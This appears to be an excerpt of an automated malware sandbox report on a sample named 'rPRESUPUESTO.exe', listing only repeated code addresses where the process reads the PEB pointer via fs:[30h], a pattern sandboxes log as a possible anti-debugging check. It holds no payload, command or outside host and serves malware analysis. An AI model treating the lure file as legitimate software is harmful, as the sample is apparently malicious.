            Source: C:\Users\user\Desktop\rPRESUPUESTO.exeCode function: 5_2_01880274 mov eax, dword ptr fs:[00000030h]5_2_01880274
            Source: C:\Users\user\Desktop\rPRESUPUESTO.exeCode function: 5_2_01880274 mov eax, dword ptr fs:[00000030h]5_2_01880274
            Source: C:\Users\user\Desktop\rPRESUPUESTO.exeCode function: 5_2_01880274 mov eax, dword ptr fs:[00000030h]5_2_01880274
            Source: C:\Users\user\Desktop\rPRESUPUESTO.exeCode function: 5_2_01880274 mov eax, dword ptr fs:[00000030h]5_2_01880274
            Source: C:\Users\user\Desktop\rPRESUPUESTO.exeCode function: 5_2_01880274 mov eax, dword ptr fs:[00000030h]5_2_01880274
            Source: C:\Users\user\Desktop\rPRESUPUESTO.exeCode function: 5_2_01880274 mov eax, dword ptr fs:[00000030h]5_2_01880274
            Source: C:\Users\user\Desktop\rPRESUPUESTO.exeCode function: 5_2_01880274 mov eax, dword ptr fs:[00000030h]5_2_01880274
            Source: C:\Users\user\Desktop\rPRESUPUESTO.exeCode function: 5_2_01804588 mov eax, dword ptr fs:[00000030h]5_2_01804588
            Source: C:\Users\user\Desktop\rPRESUPUESTO.exeCode function: 5_2_0180E59C mov eax, dword ptr fs:[00000030h]5_2_0180E59C
            Source: C:\Users\user\Desktop\rPRESUPUESTO.exeCode function: 5_2_018505A7 mov eax, dword ptr fs:[00000030h]5_2_018505A7
            Source: C:\Users\user\Desktop\rPRESUPUESTO.exeCode function: 5_2_018505A7 mov eax, dword ptr fs:[00000030h]5_2_018505A7
            Source: C:\Users\user\Desktop\rPRESUPUESTO.exeCode function: 5_2_018505A7 mov eax, dword ptr fs:[00000030h]5_2_018505A7
            Source: C:\Users\user\Desktop\rPRESUPUESTO.exeCode function: 5_2_017D8550 mov eax, dword ptr fs:[00000030h]5_2_017D8550
            Source: C:\Users\user\Desktop\rPRESUPUESTO.exeCode function: 5_2_017D8550 mov eax, dword ptr fs:[00000030h]5_2_017D8550
            Source: C:\Users\user\Desktop\rPRESUPUESTO.exeCode function: 5_2_017FE53E mov eax, dword ptr fs:[00000030h]5_2_017FE53E
            Source: C:\Users\user\Desktop\rPRESUPUESTO.exeCode function: 5_2_017FE53E mov eax, dword ptr fs:[00000030h]5_2_017FE53E
            Source: C:\Users\user\Desktop\rPRESUPUESTO.exeCode function: 5_2_017FE53E mov eax, dword ptr fs:[00000030h]5_2_017FE53E
            Source: C:\Users\user\Desktop\rPRESUPUESTO.exeCode function: 5_2_017FE53E mov eax, dword ptr fs:[00000030h]5_2_017FE53E
            Source: C:\Users\user\Desktop\rPRESUPUESTO.exeCode function: 5_2_017FE53E mov eax, dword ptr fs:[00000030h]5_2_017FE53E
            Source: C:\Users\user\Desktop\rPRESUPUESTO.exeCode function: 5_2_017E0535 mov eax, dword ptr fs:[00000030h]5_2_017E0535
            Source: C:\Users\user\Desktop\rPRESUPUESTO.exeCode function: 5_2_017E0535 mov eax, dword ptr fs:[00000030h]5_2_017E0535
            Source: C:\Users\user\Desktop\rPRESUPUESTO.exeCode function: 5_2_017E0535 mov eax, dword ptr fs:[00000030h]5_2_017E0535
            Source: C:\Users\user\Desktop\rPRESUPUESTO.exeCode function: 5_2_017E0535 mov eax, dword ptr fs:[00000030h]5_2_017E0535
            Source: C:\Users\user\Desktop\rPRESUPUESTO.exeCode function: 5_2_017E0535 mov eax, dword ptr fs:[00000030h]5_2_017E0535
            Source: C:\Users\user\Desktop\rPRESUPUESTO.exeCode function: 5_2_017E0535 mov eax, dword ptr fs:[00000030h]5_2_017E0535
            Source: C:\Users\user\Desktop\rPRESUPUESTO.exeCode function: 5_2_0180E5CF mov eax, dword ptr fs:[00000030h]5_2_0180E5CF
            Source: C:\Users\user\Desktop\rPRESUPUESTO.exeCode function: 5_2_0180E5CF mov eax, dword ptr fs:[00000030h]5_2_0180E5CF
            Source: C:\Users\user\Desktop\rPRESUPUESTO.exeCode function: 5_2_0180A5D0 mov eax, dword ptr fs:[00000030h]5_2_0180A5D0
            Source: C:\Users\user\Desktop\rPRESUPUESTO.exeCode function: 5_2_0180A5D0 mov eax, dword ptr fs:[00000030h]5_2_0180A5D0
            Source: C:\Users\user\Desktop\rPRESUPUESTO.exeCode function: 5_2_0180C5ED mov eax, dword ptr fs:[00000030h]5_2_0180C5ED
            Source: C:\Users\user\Desktop\rPRESUPUESTO.exeCode function: 5_2_0180C5ED mov eax, dword ptr fs:[00000030h]5_2_0180C5ED
            Source: C:\Users\user\Desktop\rPRESUPUESTO.exeCode function: 5_2_01866500 mov eax, dword ptr fs:[00000030h]5_2_01866500
            Source: C:\Users\user\Desktop\rPRESUPUESTO.exeCode function: 5_2_018A4500 mov eax, dword ptr fs:[00000030h]5_2_018A4500
            Source: C:\Users\user\Desktop\rPRESUPUESTO.exeCode function: 5_2_018A4500 mov eax, dword ptr fs:[00000030h]5_2_018A4500
            Source: C:\Users\user\Desktop\rPRESUPUESTO.exeCode function: 5_2_018A4500 mov eax, dword ptr fs:[00000030h]5_2_018A4500
            Source: C:\Users\user\Desktop\rPRESUPUESTO.exeCode function: 5_2_018A4500 mov eax, dword ptr fs:[00000030h]5_2_018A4500
            Source: C:\Users\user\Desktop\rPRESUPUESTO.exeCode function: 5_2_018A4500 mov eax, dword ptr fs:[00000030h]5_2_018A4500
            Source: C:\Users\user\Desktop\rPRESUPUESTO.exeCode function: 5_2_018A4500 mov eax, dword ptr fs:[00000030h]5_2_018A4500
            Source: C:\Users\user\Desktop\rPRESUPUESTO.exeCode function: 5_2_018A4500 mov eax, dword ptr fs:[00000030h]5_2_018A4500
            Source: C:\Users\user\Desktop\rPRESUPUESTO.exeCode function: 5_2_017FE5E7 mov eax, dword ptr fs:[00000030h]5_2_017FE5E7
            Source: C:\Users\user\Desktop\rPRESUPUESTO.exeCode function: 5_2_017FE5E7 mov eax, dword ptr fs:[00000030h]5_2_017FE5E7
            Source: C:\Users\user\Desktop\rPRESUPUESTO.exeCode function: 5_2_017FE5E7 mov eax, dword ptr fs:[00000030h]5_2_017FE5E7
            Source: C:\Users\user\Desktop\rPRESUPUESTO.exeCode function: 5_2_017FE5E7 mov eax, dword ptr fs:[00000030h]5_2_017FE5E7
            Source: C:\Users\user\Desktop\rPRESUPUESTO.exeCode function: 5_2_017FE5E7 mov eax, dword ptr fs:[00000030h]5_2_017FE5E7
            Source: C:\Users\user\Desktop\rPRESUPUESTO.exeCode function: 5_2_017FE5E7 mov eax, dword ptr fs:[00000030h]5_2_017FE5E7
            Source: C:\Users\user\Desktop\rPRESUPUESTO.exeCode function: 5_2_017FE5E7 mov eax, dword ptr fs:[00000030h]5_2_017FE5E7
            Source: C:\Users\user\Desktop\rPRESUPUESTO.exeCode function: 5_2_017FE5E7 mov eax, dword ptr fs:[00000030h]5_2_017FE5E7
            Source: C:\Users\user\Desktop\rPRESUPUESTO.exeCode function: 5_2_017D25E0 mov eax, dword ptr fs:[00000030h]5_2_017D25E0
            Source: C:\Users\user\Desktop\rPRESUPUESTO.exeCode function: 5_2_017D65D0 mov eax, dword ptr fs:[00000030h]5_2_017D65D0
            Source: C:\Users\user\Desktop\rPRESUPUESTO.exeCode function: 5_2_017F45B1 mov eax, dword ptr fs:[00000030h]5_2_017F45B1
            Source: C:\Users\user\Desktop\rPRESUPUESTO.exeCode function: 5_2_017F45B1 mov eax, dword ptr fs:[00000030h]5_2_017F45B1
            Source: C:\Users\user\Desktop\rPRESUPUESTO.exeCode function: 5_2_0180656A mov eax, dword ptr fs:[00000030h]5_2_0180656A
            Source: C:\Users\user\Desktop\rPRESUPUESTO.exeCode function: 5_2_0180656A mov eax, dword ptr fs:[00000030h]5_2_0180656A
            Source: C:\Users\user\Desktop\rPRESUPUESTO.exeCode function: 5_2_0180656A mov eax, dword ptr fs:[00000030h]5_2_0180656A
            Source: C:\Users\user\Desktop\rPRESUPUESTO.exeCode function: 5_2_017D2582 mov eax, dword ptr fs:[00000030h]5_2_017D2582
            Source: C:\Users\user\Desktop\rPRESUPUESTO.exeCode function: 5_2_017D2582 mov ecx, dword ptr fs:[00000030h]5_2_017D2582
            Source: C:\Users\user\Desktop\rPRESUPUESTO.exeCode function: 5_2_017FA470 mov eax, dword ptr fs:[00000030h]5_2_017FA470
            Source: C:\Users\user\Desktop\rPRESUPUESTO.exeCode function: 5_2_017FA470 mov eax, dword ptr fs:[00000030h]5_2_017FA470
            Source: C:\Users\user\Desktop\rPRESUPUESTO.exeCode function: 5_2_017FA470 mov eax, dword ptr fs:[00000030h]5_2_017FA470
            Source: C:\Users\user\Desktop\rPRESUPUESTO.exeCode function: 5_2_0188A49A mov eax, dword ptr fs:[00000030h]5_2_0188A49A
            Source: C:\Users\user\Desktop\rPRESUPUESTO.exeCode function: 5_2_017C645D mov eax, dword ptr fs:[00000030h]5_2_017C645D
            Source: C:\Users\user\Desktop\rPRESUPUESTO.exeCode function: 5_2_017F245A mov eax, dword ptr fs:[00000030h]5_2_017F245A
            Source: C:\Users\user\Desktop\rPRESUPUESTO.exeCode function: 5_2_018044B0 mov ecx, dword ptr fs:[00000030h]5_2_018044B0
            Source: C:\Users\user\Desktop\rPRESUPUESTO.exeCode function: 5_2_0185A4B0 mov eax, dword ptr fs:[00000030h]5_2_0185A4B0
            Source: C:\Users\user\Desktop\rPRESUPUESTO.exeCode function: 5_2_017CC427 mov eax, dword ptr fs:[00000030h]5_2_017CC427
            Source: C:\Users\user\Desktop\rPRESUPUESTO.exeCode function: 5_2_017CE420 mov eax, dword ptr fs:[00000030h]5_2_017CE420
            Source: C:\Users\user\Desktop\rPRESUPUESTO.exeCode function: 5_2_017CE420 mov eax, dword ptr fs:[00000030h]5_2_017CE420
            Source: C:\Users\user\Desktop\rPRESUPUESTO.exeCode function: 5_2_017CE420 mov eax, dword ptr fs:[00000030h]5_2_017CE420
            Source: C:\Users\user\Desktop\rPRESUPUESTO.exeCode function: 5_2_01808402 mov eax, dword ptr fs:[00000030h]5_2_01808402
            Source: C:\Users\user\Desktop\rPRESUPUESTO.exeCode function: 5_2_01808402 mov eax, dword ptr fs:[00000030h]5_2_01808402
            Source: C:\Users\user\Desktop\rPRESUPUESTO.exeCode function: 5_2_01808402 mov eax, dword ptr fs:[00000030h]5_2_01808402
            Source: C:\Users\user\Desktop\rPRESUPUESTO.exeCode function: 5_2_017D04E5 mov ecx, dword ptr fs:[00000030h]5_2_017D04E5
            Source: C:\Users\user\Desktop\rPRESUPUESTO.exeCode function: 5_2_01856420 mov eax, dword ptr fs:[00000030h]5_2_01856420
            Source: C:\Users\user\Desktop\rPRESUPUESTO.exeCode function: 5_2_01856420 mov eax, dword ptr fs:[00000030h]5_2_01856420
            Source: C:\Users\user\Desktop\rPRESUPUESTO.exeCode function: 5_2_01856420 mov eax, dword ptr fs:[00000030h]5_2_01856420
            Source: C:\Users\user\Desktop\rPRESUPUESTO.exeCode function: 5_2_01856420 mov eax, dword ptr fs:[00000030h]5_2_01856420
            Source: C:\Users\user\Desktop\rPRESUPUESTO.exeCode function: 5_2_01856420 mov eax, dword ptr fs:[00000030h]5_2_01856420
            Source: C:\Users\user\Desktop\rPRESUPUESTO.exeCode function: 5_2_01856420 mov eax, dword ptr fs:[00000030h]5_2_01856420
            Source: C:\Users\user\Desktop\rPRESUPUESTO.exeCode function: 5_2_01856420 mov eax, dword ptr fs:[00000030h]5_2_01856420
            Source: C:\Users\user\Desktop\rPRESUPUESTO.exeCode function: 5_2_0180A430 mov eax, dword ptr fs:[00000030h]5_2_0180A430
            Source: C:\Users\user\Desktop\rPRESUPUESTO.exeCode function: 5_2_0180E443 mov eax, dword ptr fs:[00000030h]5_2_0180E443
            Source: C:\Users\user\Desktop\rPRESUPUESTO.exeCode function: 5_2_0180E443 mov eax, dword ptr fs:[00000030h]5_2_0180E443
            Source: C:\Users\user\Desktop\rPRESUPUESTO.exeCode function: 5_2_0180E443 mov eax, dword ptr fs:[00000030h]5_2_0180E443
            Source: C:\Users\user\Desktop\rPRESUPUESTO.exeCode function: 5_2_0180E443 mov eax, dword ptr fs:[00000030h]5_2_0180E443
            Source: C:\Users\user\Desktop\rPRESUPUESTO.exeCode function: 5_2_0180E443 mov eax, dword ptr fs:[00000030h]5_2_0180E443
            Source: C:\Users\user\Desktop\rPRESUPUESTO.exeCode function: 5_2_0180E443 mov eax, dword ptr fs:[00000030h]5_2_0180E443
            Source: C:\Users\user\Desktop\rPRESUPUESTO.exeCode function: 5_2_0180E443 mov eax, dword ptr fs:[00000030h]5_2_0180E443
            Source: C:\Users\user\Desktop\rPRESUPUESTO.exeCode function: 5_2_0180E443 mov eax, dword ptr fs:[00000030h]5_2_0180E443
            Source: C:\Users\user\Desktop\rPRESUPUESTO.exeCode function: 5_2_017D64AB mov eax, dword ptr fs:[00000030h]5_2_017D64AB
            Source: C:\Users\user\Desktop\rPRESUPUESTO.exeCode function: 5_2_0188A456 mov eax, dword ptr fs:[00000030h]5_2_0188A456
            Source: C:\Users\user\Desktop\rPRESUPUESTO.exeCode function: 5_2_0185C460 mov ecx, dword ptr fs:[00000030h]5_2_0185C460
            Source: C:\Users\user\Desktop\rPRESUPUESTO.exeCode function: 5_2_0187678E mov eax, dword ptr fs:[00000030h]5_2_0187678E
            Source: C:\Users\user\Desktop\rPRESUPUESTO.exeCode function: 5_2_017D8770 mov eax, dword ptr fs:[00000030h]5_2_017D8770
            Source: C:\Users\user\Desktop\rPRESUPUESTO.exeCode function: 5_2_017E0770 mov eax, dword ptr fs:[00000030h]5_2_017E0770
            Source: C:\Users\user\Desktop\rPRESUPUESTO.exeCode function: 5_2_017E0770 mov eax, dword ptr fs:[00000030h]5_2_017E0770
            Source: C:\Users\user\Desktop\rPRESUPUESTO.exeCode function: 5_2_017E0770 mov eax, dword ptr fs:[00000030h]5_2_017E0770
            Source: C:\Users\user\Desktop\rPRESUPUESTO.exeCode function: 5_2_017E0770 mov eax, dword ptr fs:[00000030h]5_2_017E0770
            Source: C:\Users\user\Desktop\rPRESUPUESTO.exeCode function: 5_2_017E0770 mov eax, dword ptr fs:[00000030h]5_2_017E0770
            Source: C:\Users\user\Desktop\rPRESUPUESTO.exeCode function: 5_2_017E0770 mov eax, dword ptr fs:[00000030h]5_2_017E0770
            Source: C:\Users\user\Desktop\rPRESUPUESTO.exeCode function: 5_2_017E0770 mov eax, dword ptr fs:[00000030h]5_2_017E0770
            Source: C:\Users\user\Desktop\rPRESUPUESTO.exeCode function: 5_2_017E0770 mov eax, dword ptr fs:[00000030h]5_2_017E0770
            Source: C:\Users\user\Desktop\rPRESUPUESTO.exeCode function: 5_2_017E0770 mov eax, dword ptr fs:[00000030h]5_2_017E0770
            Source: C:\Users\user\Desktop\rPRESUPUESTO.exeCode function: 5_2_017E0770 mov eax, dword ptr fs:[00000030h]5_2_017E0770
            Source: C:\Users\user\Desktop\rPRESUPUESTO.exeCode function: 5_2_017E0770 mov eax, dword ptr fs:[00000030h]5_2_017E0770
            Source: C:\Users\user\Desktop\rPRESUPUESTO.exeCode function: 5_2_017E0770 mov eax, dword ptr fs:[00000030h]5_2_017E0770
            Source: C:\Users\user\Desktop\rPRESUPUESTO.exeCode function: 5_2_018847A0 mov eax, dword ptr fs:[00000030h]5_2_018847A0
            Source: C:\Users\user\Desktop\rPRESUPUESTO.exeCode function: 5_2_017D0750 mov eax, dword ptr fs:[00000030h]5_2_017D0750
            Source: C:\Users\user\Desktop\rPRESUPUESTO.exeCode function: 5_2_018507C3 mov eax, dword ptr fs:[00000030h]5_2_018507C3
            Source: C:\Users\user\Desktop\rPRESUPUESTO.exeCode function: 5_2_0185E7E1 mov eax, dword ptr fs:[00000030h]5_2_0185E7E1
            Source: C:\Users\user\Desktop\rPRESUPUESTO.exeCode function: 5_2_017D0710 mov eax, dword ptr fs:[00000030h]5_2_017D0710
            Source: C:\Users\user\Desktop\rPRESUPUESTO.exeCode function: 5_2_0180C700 mov eax, dword ptr fs:[00000030h]5_2_0180C700
            Source: C:\Users\user\Desktop\rPRESUPUESTO.exeCode function: 5_2_017D47FB mov eax, dword ptr fs:[00000030h]5_2_017D47FB
            Source: C:\Users\user\Desktop\rPRESUPUESTO.exeCode function: 5_2_017D47FB mov eax, dword ptr fs:[00000030h]5_2_017D47FB
            Source: C:\Users\user\Desktop\rPRESUPUESTO.exeCode function: 5_2_01800710 mov eax, dword ptr fs:[00000030h]5_2_01800710
            Source: C:\Users\user\Desktop\rPRESUPUESTO.exeCode function: 5_2_017F27ED mov eax, dword ptr fs:[00000030h]5_2_017F27ED
            Source: C:\Users\user\Desktop\rPRESUPUESTO.exeCode function: 5_2_017F27ED mov eax, dword ptr fs:[00000030h]5_2_017F27ED
            Source: C:\Users\user\Desktop\rPRESUPUESTO.exeCode function: 5_2_017F27ED mov eax, dword ptr fs:[00000030h]5_2_017F27ED
            Source: C:\Users\user\Desktop\rPRESUPUESTO.exeCode function: 5_2_0180C720 mov eax, dword ptr fs:[00000030h]5_2_0180C720
            Source: C:\Users\user\Desktop\rPRESUPUESTO.exeCode function: 5_2_0180C720 mov eax, dword ptr fs:[00000030h]5_2_0180C720
            Source: C:\Users\user\Desktop\rPRESUPUESTO.exeCode function: 5_2_0184C730 mov eax, dword ptr fs:[00000030h]5_2_0184C730
            Source: C:\Users\user\Desktop\rPRESUPUESTO.exeCode function: 5_2_0180273C mov eax, dword ptr fs:[00000030h]5_2_0180273C
            Source: C:\Users\user\Desktop\rPRESUPUESTO.exeCode function: 5_2_0180273C mov ecx, dword ptr fs:[00000030h]5_2_0180273C
            Source: C:\Users\user\Desktop\rPRESUPUESTO.exeCode function: 5_2_0180273C mov eax, dword ptr fs:[00000030h]5_2_0180273C
            Source: C:\Users\user\Desktop\rPRESUPUESTO.exeCode function: 5_2_017DC7C0 mov eax, dword ptr fs:[00000030h]5_2_017DC7C0
            Source: C:\Users\user\Desktop\rPRESUPUESTO.exeCode function: 5_2_0180674D mov esi, dword ptr fs:[00000030h]5_2_0180674D
            Source: C:\Users\user\Desktop\rPRESUPUESTO.exeCode function: 5_2_0180674D mov eax, dword ptr fs:[00000030h]5_2_0180674D
            Source: C:\Users\user\Desktop\rPRESUPUESTO.exeCode function: 5_2_0180674D mov eax, dword ptr fs:[00000030h]5_2_0180674D
            Source: C:\Users\user\Desktop\rPRESUPUESTO.exeCode function: 5_2_01854755 mov eax, dword ptr fs:[00000030h]5_2_01854755
            Source: C:\Users\user\Desktop\rPRESUPUESTO.exeCode function: 5_2_01812750 mov eax, dword ptr fs:[00000030h]5_2_01812750
            Source: C:\Users\user\Desktop\rPRESUPUESTO.exeCode function: 5_2_01812750 mov eax, dword ptr fs:[00000030h]5_2_01812750
            Source: C:\Users\user\Desktop\rPRESUPUESTO.exeCode function: 5_2_017D07AF mov eax, dword ptr fs:[00000030h]5_2_017D07AF
            Source: C:\Users\user\Desktop\rPRESUPUESTO.exeCode function: 5_2_0185E75D mov eax, dword ptr fs:[00000030h]5_2_0185E75D
            Source: C:\Users\user\Desktop\rPRESUPUESTO.exeCode function: 5_2_0180C6A6 mov eax, dword ptr fs:[00000030h]5_2_0180C6A6
            Source: C:\Users\user\Desktop\rPRESUPUESTO.exeCode function: 5_2_018066B0 mov eax, dword ptr fs:[00000030h]5_2_018066B0
            Source: C:\Users\user\Desktop\rPRESUPUESTO.exeCode function: 5_2_017EC640 mov eax, dword ptr fs:[00000030h]5_2_017EC640
            Source: C:\Users\user\Desktop\rPRESUPUESTO.exeCode function: 5_2_0180A6C7 mov ebx, dword ptr fs:[00000030h]5_2_0180A6C7
            Source: C:\Users\user\Desktop\rPRESUPUESTO.exeCode function: 5_2_0180A6C7 mov eax, dword ptr fs:[00000030h]5_2_0180A6C7
            Source: C:\Users\user\Desktop\rPRESUPUESTO.exeCode function: 5_2_017D262C mov eax, dword ptr fs:[00000030h]5_2_017D262C
            Source: C:\Users\user\Desktop\rPRESUPUESTO.exeCode function: 5_2_017EE627 mov eax, dword ptr fs:[00000030h]5_2_017EE627
            Source: C:\Users\user\Desktop\rPRESUPUESTO.exeCode function: 5_2_018506F1 mov eax, dword ptr fs:[00000030h]5_2_018506F1
            Source: C:\Users\user\Desktop\rPRESUPUESTO.exeCode function: 5_2_018506F1 mov eax, dword ptr fs:[00000030h]5_2_018506F1
            Source: C:\Users\user\Desktop\rPRESUPUESTO.exeCode function: 5_2_017E260B mov eax, dword ptr fs:[00000030h]5_2_017E260B
            Source: C:\Users\user\Desktop\rPRESUPUESTO.exeCode function: 5_2_017E260B mov eax, dword ptr fs:[00000030h]5_2_017E260B
            Source: C:\Users\user\Desktop\rPRESUPUESTO.exeCode function: 5_2_017E260B mov eax, dword ptr fs:[00000030h]5_2_017E260B
            Source: C:\Users\user\Desktop\rPRESUPUESTO.exeCode function: 5_2_017E260B mov eax, dword ptr fs:[00000030h]5_2_017E260B
            Source: C:\Users\user\Desktop\rPRESUPUESTO.exeCode function: 5_2_017E260B mov eax, dword ptr fs:[00000030h]5_2_017E260B
            Source: C:\Users\user\Desktop\rPRESUPUESTO.exeCode function: 5_2_017E260B mov eax, dword ptr fs:[00000030h]5_2_017E260B
            Source: C:\Users\user\Desktop\rPRESUPUESTO.exeCode function: 5_2_017E260B mov eax, dword ptr fs:[00000030h]5_2_017E260B
            Source: C:\Users\user\Desktop\rPRESUPUESTO.exeCode function: 5_2_0184E6F2 mov eax, dword ptr fs:[00000030h]5_2_0184E6F2
            Source: C:\Users\user\Desktop\rPRESUPUESTO.exeCode function: 5_2_0184E6F2 mov eax, dword ptr fs:[00000030h]5_2_0184E6F2
            Source: C:\Users\user\Desktop\rPRESUPUESTO.exeCode function: 5_2_0184E6F2 mov eax, dword ptr fs:[00000030h]5_2_0184E6F2
            Source: C:\Users\user\Desktop\rPRESUPUESTO.exeCode function: 5_2_0184E6F2 mov eax, dword ptr fs:[00000030h]5_2_0184E6F2
            Source: C:\Users\user\Desktop\rPRESUPUESTO.exeCode function: 5_2_0184E609 mov eax, dword ptr fs:[00000030h]5_2_0184E609
            Source: C:\Users\user\Desktop\rPRESUPUESTO.exeCode function: 5_2_01812619 mov eax, dword ptr fs:[00000030h]5_2_01812619
            Source: C:\Users\user\Desktop\rPRESUPUESTO.exeCode function: 5_2_01806620 mov eax, dword ptr fs:[00000030h]5_2_01806620
            Source: C:\Users\user\Desktop\rPRESUPUESTO.exeCode function: 5_2_01808620 mov eax, dword ptr fs:[00000030h]5_2_01808620
            Source: C:\Users\user\Desktop\rPRESUPUESTO.exeCode function: 5_2_0180A660 mov eax, dword ptr fs:[00000030h]5_2_0180A660
            Source: C:\Users\user\Desktop\rPRESUPUESTO.exeCode function: 5_2_0180A660 mov eax, dword ptr fs:[00000030h]5_2_0180A660
            Source: C:\Users\user\Desktop\rPRESUPUESTO.exeCode function: 5_2_0189866E mov eax, dword ptr fs:[00000030h]5_2_0189866E
            Source: C:\Users\user\Desktop\rPRESUPUESTO.exeCode function: 5_2_0189866E mov eax, dword ptr fs:[00000030h]5_2_0189866E
            Source: C:\Users\user\Desktop\rPRESUPUESTO.exeCode function: 5_2_017D4690 mov eax, dword ptr fs:[00000030h]5_2_017D4690
            Source: C:\Users\user\Desktop\rPRESUPUESTO.exeCode function: 5_2_017D4690 mov eax, dword ptr fs:[00000030h]5_2_017D4690
            Source: C:\Users\user\Desktop\rPRESUPUESTO.exeCode function: 5_2_01802674 mov eax, dword ptr fs:[00000030h]5_2_01802674
            Source: C:\Users\user\Desktop\rPRESUPUESTO.exeCode function: 5_2_017F6962 mov eax, dword ptr fs:[00000030h]5_2_017F6962
            Source: C:\Users\user\Desktop\rPRESUPUESTO.exeCode function: 5_2_017F6962 mov eax, dword ptr fs:[00000030h]5_2_017F6962
            Source: C:\Users\user\Desktop\rPRESUPUESTO.exeCode function: 5_2_017F6962 mov eax, dword ptr fs:[00000030h]5_2_017F6962
            Source: C:\Users\user\Desktop\rPRESUPUESTO.exeCode function: 5_2_018589B3 mov esi, dword ptr fs:[00000030h]5_2_018589B3
            Source: C:\Users\user\Desktop\rPRESUPUESTO.exeCode function: 5_2_018589B3 mov eax, dword ptr fs:[00000030h]5_2_018589B3
            Source: C:\Users\user\Desktop\rPRESUPUESTO.exeCode function: 5_2_018589B3 mov eax, dword ptr fs:[00000030h]5_2_018589B3
            Source: C:\Users\user\Desktop\rPRESUPUESTO.exeCode function: 5_2_018669C0 mov eax, dword ptr fs:[00000030h]5_2_018669C0
            Source: C:\Users\user\Desktop\rPRESUPUESTO.exeCode function: 5_2_018049D0 mov eax, dword ptr fs:[00000030h]5_2_018049D0
            Source: C:\Users\user\Desktop\rPRESUPUESTO.exeCode function: 5_2_0189A9D3 mov eax, dword ptr fs:[00000030h]5_2_0189A9D3
            Source: C:\Users\user\Desktop\rPRESUPUESTO.exeCode function: 5_2_017C8918 mov eax, dword ptr fs:[00000030h]5_2_017C8918
            Source: C:\Users\user\Desktop\rPRESUPUESTO.exeCode function: 5_2_017C8918 mov eax, dword ptr fs:[00000030h]5_2_017C8918
            Source: C:\Users\user\Desktop\rPRESUPUESTO.exeCode function: 5_2_0185E9E0 mov eax, dword ptr fs:[00000030h]5_2_0185E9E0
            Source: C:\Users\user\Desktop\rPRESUPUESTO.exeCode function: 5_2_018029F9 mov eax, dword ptr fs:[00000030h]5_2_018029F9
            Source: C:\Users\user\Desktop\rPRESUPUESTO.exeCode function: 5_2_018029F9 mov eax, dword ptr fs:[00000030h]5_2_018029F9
            Source: C:\Users\user\Desktop\rPRESUPUESTO.exeCode function: 5_2_0184E908 mov eax, dword ptr fs:[00000030h]5_2_0184E908
            Source: C:\Users\user\Desktop\rPRESUPUESTO.exeCode function: 5_2_0184E908 mov eax, dword ptr fs:[00000030h]5_2_0184E908
            Source: C:\Users\user\Desktop\rPRESUPUESTO.exeCode function: 5_2_0185C912 mov eax, dword ptr fs:[00000030h]5_2_0185C912
            Source: C:\Users\user\Desktop\rPRESUPUESTO.exeCode function: 5_2_017DA9D0 mov eax, dword ptr fs:[00000030h]5_2_017DA9D0
            Source: C:\Users\user\Desktop\rPRESUPUESTO.exeCode function: 5_2_017DA9D0 mov eax, dword ptr fs:[00000030h]5_2_017DA9D0
            Source: C:\Users\user\Desktop\rPRESUPUESTO.exeCode function: 5_2_017DA9D0 mov eax, dword ptr fs:[00000030h]5_2_017DA9D0
            Source: C:\Users\user\Desktop\rPRESUPUESTO.exeCode function: 5_2_017DA9D0 mov eax, dword ptr fs:[00000030h]5_2_017DA9D0
            Source: C:\Users\user\Desktop\rPRESUPUESTO.exeCode function: 5_2_017DA9D0 mov eax, dword ptr fs:[00000030h]5_2_017DA9D0
            Source: C:\Users\user\Desktop\rPRESUPUESTO.exeCode function: 5_2_017DA9D0 mov eax, dword ptr fs:[00000030h]5_2_017DA9D0
            Source: C:\Users\user\Desktop\rPRESUPUESTO.exeCode function: 5_2_0186892B mov eax, dword ptr fs:[00000030h]5_2_0186892B
            Source: C:\Users\user\Desktop\rPRESUPUESTO.exeCode function: 5_2_0185892A mov eax, dword ptr fs:[00000030h]5_2_0185892A
            Source: C:\Users\user\Desktop\rPRESUPUESTO.exeCode function: 5_2_01850946 mov eax, dword ptr fs:[00000030h]5_2_01850946
            Source: C:\Users\user\Desktop\rPRESUPUESTO.exeCode function: 5_2_018A4940 mov eax, dword ptr fs:[00000030h]5_2_018A4940
            Source: C:\Users\user\Desktop\rPRESUPUESTO.exeCode function: 5_2_017D09AD mov eax, dword ptr fs:[00000030h]5_2_017D09AD
            Source: C:\Users\user\Desktop\rPRESUPUESTO.exeCode function: 5_2_017D09AD mov eax, dword ptr fs:[00000030h]5_2_017D09AD
            Source: C:\Users\user\Desktop\rPRESUPUESTO.exeCode function: 5_2_017E29A0 mov eax, dword ptr fs:[00000030h]5_2_017E29A0
            Source: C:\Users\user\Desktop\rPRESUPUESTO.exeCode function: 5_2_017E29A0 mov eax, dword ptr fs:[00000030h]5_2_017E29A0
            Source: C:\Users\user\Desktop\rPRESUPUESTO.exeCode function: 5_2_017E29A0 mov eax, dword ptr fs:[00000030h]5_2_017E29A0
            Source: C:\Users\user\Desktop\rPRESUPUESTO.exeCode function: 5_2_017E29A0 mov eax, dword ptr fs:[00000030h]5_2_017E29A0
            Source: C:\Users\user\Desktop\rPRESUPUESTO.exeCode function: 5_2_017E29A0 mov eax, dword ptr fs:[00000030h]5_2_017E29A0
            Source: C:\Users\user\Desktop\rPRESUPUESTO.exeCode function: 5_2_017E29A0 mov eax, dword ptr fs:[00000030h]5_2_017E29A0
            Source: C:\Users\user\Desktop\rPRESUPUESTO.exeCode function: 5_2_017E29A0 mov eax, dword ptr fs:[00000030h]5_2_017E29A0
            Source: C:\Users\user\Desktop\rPRESUPUESTO.exeCode function: 5_2_017E29A0 mov eax, dword ptr fs:[00000030h]5_2_017E29A0
            Source: C:\Users\user\Desktop\rPRESUPUESTO.exeCode function: 5_2_017E29A0 mov eax, dword ptr fs:[00000030h]5_2_017E29A0
            Source: C:\Users\user\Desktop\rPRESUPUESTO.exeCode function: 5_2_017E29A0 mov eax, dword ptr fs:[00000030h]5_2_017E29A0
            Source: C:\Users\user\Desktop\rPRESUPUESTO.exeCode function: 5_2_017E29A0 mov eax, dword ptr fs:[00000030h]5_2_017E29A0
            Source: C:\Users\user\Desktop\rPRESUPUESTO.exeCode function: 5_2_017E29A0 mov eax, dword ptr fs:[00000030h]5_2_017E29A0
            Source: C:\Users\user\Desktop\rPRESUPUESTO.exeCode function: 5_2_017E29A0 mov eax, dword ptr fs:[00000030h]5_2_017E29A0
            Source: C:\Users\user\Desktop\rPRESUPUESTO.exeCode function: 5_2_0181096E mov eax, dword ptr fs:[00000030h]5_2_0181096E
